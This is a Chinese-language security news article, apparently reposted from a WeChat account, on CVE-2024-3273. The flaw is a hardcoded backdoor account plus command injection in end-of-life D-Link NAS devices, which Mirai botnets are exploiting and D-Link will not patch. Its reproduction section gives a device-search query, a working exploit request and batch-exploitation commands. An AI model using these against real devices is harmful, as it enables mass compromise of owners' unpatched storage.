一、 漏洞描述
D-Link DNS-320L、DNS-325、DNS-327L、DNS-340L等多个产品的/cgi-bin/nas_sharing.cgi脚本中存在硬编码后门漏洞(用户名messagebus,密码为空),以及可通过system参数导致命令注入漏洞,威胁者可组合利用这两个漏洞通过HTTP GET请求将Base64编码的命令添加到system参数从而在系统上执行任意命令,成功利用可能导致未授权访问敏感信息、修改系统配置或拒绝服务等。
目前,攻击者正积极瞄准超过 92,000 台已停产的 D-Link 网络附加存储 (NAS) 设备,这些设备在线暴露且未修补严重的远程代码执行 (RCE) 零日漏洞。正如 BleepingComputer 在周六首次报道的那样,此安全漏洞(CVE-2024-3273[1])是通过硬编码帐户(用户名“messagebus”,密码为空)实现的后门和通过“system”参数的命令注入问题造成的。威胁者现在正利用这两个安全漏洞来部署 Mirai 恶意软件的变种 ( skid.x86[2])。Mirai 变种通常旨在将受感染的设备添加到僵尸网络中,用于大规模分布式拒绝服务 (DDoS) 攻击。网络安全公司 GreyNoise[3]和威胁监控平台 ShadowServer[4]观察到,这些攻击始于周一。两周前,安全研究员 Netsecfish在 D-Link 通知他们这些停产设备不会修补后披露了该漏洞。[5]Netsecfish 解释说:“所描述的漏洞影响多款 D-Link NAS 设备,包括 DNS-340L、DNS-320L、DNS-327L 和 DNS-325 等型号。成功利用此漏洞可能允许攻击者在系统上执行任意命令,可能导致未经授权访问敏感信息、修改系统配置或拒绝服务条件。”
当被问及是否会发布安全更新来修补此零日漏洞时,D-Link 还告诉 BleepingComputer,他们不再支持这些寿命终止 (EOL) 的 NAS 设备。D-Link 发言人告诉 BleepingComputer:“所有 D-Link 网络附加存储产品的使用寿命和使用寿命都已终止多年,并且与这些产品相关的资源已停止开发且不再受支持。” “D-Link 建议淘汰这些产品,并用可接收固件更新的产品替代它们。”
模型 | 使用寿命结束 | 修复固件 | 结论 |
DNS-320L | 2020 年 5 月 31 日:链接[6] | 无法使用 | 淘汰与替换 |
DNS-325 | 2017 年 9 月 1 日:链接[7] | 无法使用 | 淘汰与替换 |
DNS-327L | 2020 年 5 月 31 日:链接[8] | 无法使用 | 淘汰与替换 |
DNS-340L | 2019 年 7 月 31 日:链接[9] | 无法使用 | 淘汰与替换 |
该发言人补充说,这些 NAS 设备没有自动在线更新或警报发送功能,因此无法通知所有者这些正在发生的攻击。漏洞披露后,D-Link于周四发布了安全公告[10],通知设备所有者有关此安全漏洞的信息,并建议他们尽快淘汰或更换受影响的设备。它还为旧设备创建了一个支持页面[11],警告用户应用旧支持网站提供的最新安全和固件更新,尽管这并不能保护他们的设备免受攻击者的攻击。D-Link 警告称:“如果美国消费者违反 D-Link 的建议继续使用这些设备,请确保设备已安装最新的固件。” D-Link 没有说的是,NAS 设备不应该暴露在网上,因为它们通常是勒索软件攻击的目标,[12]目的是窃取或加密数据。近几个月来,其他 D-Link 设备(其中一些也已报废)已成为多个基于 Mirai 的 DDoS 僵尸网络[13] (其中一个 被追踪为 IZ1H9[14])的攻击目标。这些设备的所有者正在不断扩展其功能,增加新的漏洞和攻击目标。
二、漏洞复现
fofa:
_fid="hWN+yVVhLzKJaLkd/ITHpA==" && Country !="CN"
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Accept-Encoding: identity
Accept: */*
Connection: keep-alive
使用脚本批量验证:
pip install -r requirements.txt
python3 exploit.py -u http://127.0.0.1
python3 exploit.py -f 1.txt
项目地址:
https://github.com/Chocapikk/CVE-2024-3273[15]
References
[1]
CVE-2024-3273: https://nvd.nist.gov/vuln/detail/CVE-2024-3273
[2]
skid.x86: https://www.virustotal.com/gui/file/859e679f8e8be4a4c895139fb7fb1b177627bbe712e1ed4c316ec85008426db8
[3]
网络安全公司 GreyNoise: https://twitter.com/GreyNoiseIO/status/1777417884421050809
[4]
威胁监控平台 ShadowServer: https://twitter.com/Shadowserver/status/1777303654242062428
[5]
披露了该漏洞。: https://github.com/netsecfish/dlink
[6]
链接: https://legacy.us.dlink.com/pages/product.aspx?id=5182449a065f43329cc66a09d43b1c79
[7]
链接: https://legacy.us.dlink.com/pages/product.aspx?id=33414e5df798424eb1c5b5e23a88f98c
[8]
链接: https://legacy.us.dlink.com/pages/product.aspx?id=cc564abbd17c44d184b718dc8eb43784
[9]
链接: https://legacy.us.dlink.com/pages/product.aspx?id=f826f93dfa974aaba4a777badc9dcd81
[10]
发布了安全公告: https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383
[11]
为旧设备创建了一个支持页面: https://legacy.us.dlink.com/
[12]
通常是勒索软件攻击的目标,: https://www.bleepingcomputer.com/tag/nas/
[13]
Mirai 的 DDoS 僵尸网络: https://www.bleepingcomputer.com/news/security/mirai-botnet-targets-22-flaws-in-d-link-zyxel-netgear-devices/
[14]
被追踪为 IZ1H9: https://www.bleepingcomputer.com/news/security/mirai-ddos-malware-variant-expands-targets-with-13-router-exploits/
[15]
: https://github.com/Chocapikk/CVE-2024-3273
原文始发于微信公众号(云鸦安全):黑客:谢谢你,D-Link
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论